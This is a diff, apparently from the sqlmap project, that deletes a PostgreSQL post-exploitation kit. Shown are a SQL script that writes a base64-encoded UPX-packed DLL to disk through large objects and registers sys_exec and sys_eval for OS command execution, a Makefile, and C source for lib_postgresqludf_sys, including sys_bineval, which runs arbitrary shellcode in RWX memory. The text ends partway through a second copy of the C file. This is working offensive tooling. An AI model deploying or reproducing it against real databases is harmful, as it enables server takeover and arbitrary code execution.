AAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAAD5IYNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAgBAAABAQAACQEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
--- DLL compiled using PostgreSQL 8.2 C libraries
--- INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMAUx6DSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCXeP6gEDsfuvE1UAABwLAAAAIAAAJgAAXkB2Sf64AAAQ+MPMDxEM+9/+f1NVi2wkDItFEFZXUOgbAgKL2Iszgeb/AN1/938/g+4EjU4BUf8VQoxWjVMEi/hSVyMK/7GP/bBXxgQ3ABeEV4vwCJSDxBw7XRB0W/Zv3wlTRQgNBF+Lxl5dW2p/bfllLxDDEoHsCAShAu2zdf8gADPEiYQkBA2LBgxAEJ2F3d5kli2FgYs3nLIdefvVVoPHmNhXU2oBmTO3sdvu1WhlFFOaM/+ciCBTjdvYd+1UJDgWVlKJXCQ8FnylLLf///+FwHRbjUQkFI1QAesDjUkAighAhMl1+SvCMo0sfbeNtTt+KHhJUyQgUAP+V9iT7o8QgItMJCRRUiyL/VDY2fZyIHWvi2EQsFMXXzh8w5AOgD4AdAQ3FsZEN/+u/bK7AHCNZCRvg8AEULjggbnyucYsHKQAH/Ync+2JBxwZElCNRwRWUPjNF1w7i4ydiHYMi8dfM+7C4YfMNQ6BxF1u/yWF3/7hsagFpDsNbHUC88PpCAXLi/8QK2PuVmiAaOhw8f7/u7zHWVmjI1gEVIX2dQUzwEBew4MmAF3h6+5WB5loBMMJgnulBhuttbHVC1kjIk5Q7FfY/dtRUQo5RQx1DjkFaxB+bnMtNO7+EIN9DAGLCRBIiybYiWG3dd8KI0gPhdR9ZBcYBot5y7W72241ICiJ';
--- UPDATE udftest SET data=data||'PVC7HlDrGEoLD/bfpwSOO8d0F2joA6gsagDy/3fd9obWbOfrB8csATyhL0xqAm/37oZe0glqH5IJRus8qhDABHXte++4xwUfKBpA4CcH79/3nVyLILQEsBs6WYk1K/tztxs9WTmydQhpczA5PRXS3+69XHQcaAYoCHxDDf91PL7Y9rYDCCMW//FUiH+suRkB3AgBodt4BINl/ACZyM5m39sP1Pxjg7Ung/gCZtJZW//NsI19oFhLUDFZLjXmaN/hD4SHxxlUE0kU8e2luxgQiX2N7wQ7yHJRgz/b2j+2g/NqbDkHdOn/NyYg+BDabKExXLn4VhVxx+3NRBtHTfhVOU0Q27b2rQPQCHS0iQkCDBoIYGN20nbrp/YM/VlELttXiBE4WAZMMvwbjiALP1BDm1u/9Db8ycIMAGoQQxIo0Fv5i/KLXbK7vbkIHFTkM8lc/Il9IAhbi7Hw/DvxWjk6RBfk4c3/H6+EO/B0BYP+AnUuoew7wXSeFm64bVZf0Dte5AADkz24D2cR/mwUFoBWw7+TEglSJ/4BdSRkIFrEZoWzE1d3L1L+Gu010gYRU/dqA3VDYc92w080AyFodC4sLVx42CV/6xtx7IsXCXCpfLyq4FBRZEwQZei5Gg6t9i/60v67tcdv2xkFnSrkIb3DluyvcJrUFv87JGobd7cKjvZUfUhVDA0EklnKBWKGXTgiMygDbt5MG18hIEMFHIkVGIkd+25ubhSJNRCJPQxmjBg4BmZplmYNLB0IBe9uaZYEJQAtf/ycjxT5s421MJVWJAcEKI1FCLMx1v40i4Xg/KCqcJUBbR3btRwZICQTGAllwLm7ZowJHLNgiYXYMr4xzPIKBNwDFDRodMZfBaa0jFlq9xjWvs/geUYcgz0gAPkjrEDsHWhbG34G8cJ7eiTJw4BAHhTDahQLKSnySlAVqvj8/pMeopwQZFnrZ2oIN6RZQ3LDOI/tJzXDrdC6WTTg9b8D5FB/bSNgvkt0Zp4c3CpbjK0ULNbiCeDlJbRXG9I6';
--- UPDATE udftest SET data=data||'2wd53IRnk9xsmFnZTttt/u8WBt332BvA99hZSF1WuLwYvgQaHX/pV1A7xnMPiwdTAlA5rPQO1jv+cvEwJSALEinkIE9pDd6+ETUIuE1aLmY5AXP/8u9KWGhBPAPBgThQRXXvM9K5CwEbdoN/HEgYD5Tnwl07PyW+NS3dSDHID7dBRaVLbLdWBXEGM1cACBgR/98ajXbkoBwMO/lyCYtYCAPZO/sztd/gcgpCnCg71nLoat9ONh8O2U9q/qNwaNVkGOYbOBICUIPsCCnpu+HWMWYzxXDwZKMaiTAMFj5DTAloT/BwfV1nYuwS71WXLRNQt2iWhxkILAg7KyTBFYJw4egf9w/gAYkD1HbbqU8dAFmUi+WWKdaxnZ0Byj2pwPqdYmUt2C+7MUZGxk43PAVAREzG8uOSqRKwEOwJZbN2ch0Qyar776UWBh5a/T6UM5dttmwDjSvg+vzxQLAGmjyu/IrZwCbBdw3DlZYzHBzGUU4Ued6xfOh2aQISBCAUCqoYka3Y71yj7BBogvg7aA7+U1e/TuZAu35mfA2F6KdCicMrNZQE62C2xKRW43hjEXWYxhaKtZILl/AHNNHMlUEInSe++1vbOPQzDBE793UHvk9Z6wuF83XsEfgup8HgEAvwyAD31gfGRih9BF5fW7o/mAWcRkZGRlhcYGgAAGRHVAAA1CgV8gIhAI10Z9l9pRQRIgNkA0Bl0AzSAXJIXf///RJREhBLUlNEUwG3/T9I581Otf//N//blFHkL74MDGM6XERvY3VtZW50cyBhbmQgU2X//9v/dHRpbmdzXEFkbQdpc3RyYXRvci5XMkszU1RFTv63t/ZVUERBBjNlc2sWcFxzaGFyZVx2/O3/3yZ1YWxfY3BwX3Byb2plY3Q+bGliX3Bv/f//tmcfc3FsdWRmX3N5c184MlxSZWxlYXNlIMd+gSAucGRi0dUZbPK9WHcH0A91g3WVq6EHbQOBAzslhyfMB30PJNGdsNgfCQsDH9AogwAAAn0DpaLtsRm/RP+q';
--- UPDATE udftest SET data=data||'iiSCAIAAAGAw/woqwEIU//+XZ3gQAUdldEN1cnJlbnRQcm9jZXNzvf//yElkU3lzdGVtVGltZUFzRmlsZQn+1n6LGAhja0NvdS8NUXVlcnlQrcXa3wNmb3JtYW48Fg4Y3/6t+0Rpc2FiM2hXYWRMaWJyYSdDYWxsXCv/t3NvSXNEZWJ1Z2dlcm127W172VRTVW5oQGQxZEV4Rq2wmPtwdGlvbnNKGQTQtpS5ElQXtm+ytkRhHhFJkGwMa8257dZAnW1wh2VHUX9Zwlpzd1VRIhtCYbZsXMQVM6y7Pc2FPF9jaXQ0bQrXtu8GXzRfYW1zZwh4EQvtd7/wZGp1Ql9mZGl2DV9DcHBYY78JoP1hvF9kZWNvA5HctjBhaTJdbR55GGxr7xVCizL1CW5NESYLFhMPZQ2+dvuEXxtyNF9MbW0cGG5bs2v/V2RfbnU9RG1hYx5ye25hYzRuc9gdCMZuhm1m8nQsrnJuhHPN3O0d/N0qcGVVRV5zhfYPYwe0MDrvsdsE51bIzotvb7aGoX1rIlZuX3R5ORwaFlsotIkVil9yCp49zcJsRpGkcEVwZwFccO9DdG9hc0u6dW3///9nVhAzGAksFiMtCxcpERcRB4YGBhcJBwUWDB5/+///CAoLFgkYGBUFBhsFDBAGBxcGIQURDwYUIRELCCff/7crIgUHDREdDRhTLUg4BgAHCLJt3y4MCTMKCQsMWwUWFu7f/u0OCzQVCxgWDT0FQrwFEh4UBmky2d7N/xEMDh1NBRcjDQwkCAtEAvBvKvh/NARgBOgIBBwcBAAyTAEFAC3/YfVTHoNJNOAAAiELAQkMCJj9JlsArBULbOa+9xoJCwLeHgf3uzTfA2AEc4IeQAEqbM+WvQIHBnAmB7hmtm/ZjCJQFEBPsACrZntTUJ930BzVtyx2IBghQgAvbPMDSbAudGV4dLoKkMNDNhsMt0JgLnLLLWGQW2H7KAcIE7rvNYcCQC4m/gOUMLhN2WkCJ8BPc3Jg3wvWgOuwcxpPzc3RCFKp';
--- UPDATE udftest SET data=data||'T4wBUPtNySAeQhuMIxIAAHxyoVJTAAASAAAA/wAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnDmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAABTHoNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAkBAAABAQAACgEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
-
--- Create a new OID for a large object, it implicitly adds an entry in the
--- PostgreSQL large objects system table
--- 
--- References:
--- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
--- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
--- Update the PostgreSQL system large objects table assigning to the just
--- created OID the binary (base64 decoded) UDF as data
--- 
--- Refereces:
--- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
--- Export the binary UDF OID to a file on the file system
--- 
--- Any folder where postgres user has read/write/execute access is valid
--- SELECT lo_export(35817, E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll');
--- 
--- Notes:
--- If the library file already exists, the user postgres does not have
--- access to overwrite it
--- The following enumerates the PostgreSQL data directory
--- SELECT CURRENT_SETTING('data_directory')
--- Reference:
--- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
--- The following will save into C:\Program Files\PostgreSQL\8.3\data
-SELECT lo_export(35817, 'lib_postgresqludf_sys.dll'); -- Favourite one, no need to enumerate the PostgreSQL data directory before
--- The following will save into nowhere
--- SELECT lo_export(35817, E'\lib_postgresqludf_sys.dll');
--- The following would save into C:\ (Permission denied)
--- SELECT lo_export(35817, E'\\lib_postgresqludf_sys.dll');
-
-
--- Create two functions from the binary UDF file
--- CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
--- CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
--- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_postgresqludf_sys.txt'); -- %TEMP% path is C:\Documents and Settings\postgres\Local Settings\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%\\lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);

extra/postgresqludfsys/lib_postgresqludf_sys/linux/Makefile

@@ -1,11 +0,0 @@
-LIBDIR=/tmp
-
-8.2:
-	gcc -Wall -I/usr/include/postgresql/8.2/server -O1 -shared src/8.2/lib_postgresqludf_sys.c -o so/8.2/lib_postgresqludf_sys.so
-	strip -sx so/8.2/lib_postgresqludf_sys.so
-	cp -f so/8.2/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc -Wall -I/usr/include/postgresql/8.3/server -O1 -shared src/8.3/lib_postgresqludf_sys.c -o so/8.3/lib_postgresqludf_sys.so
-	strip -sx so/8.3/lib_postgresqludf_sys.so
-	cp -f so/8.3/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.2/lib_postgresqludf_sys.c

@@ -1,192 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif

extra/postgresqludfsys/lib_postgresqludf_sys/windows/src/8.2/lib_postgresqludf_sys.c

@@ -1,192 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
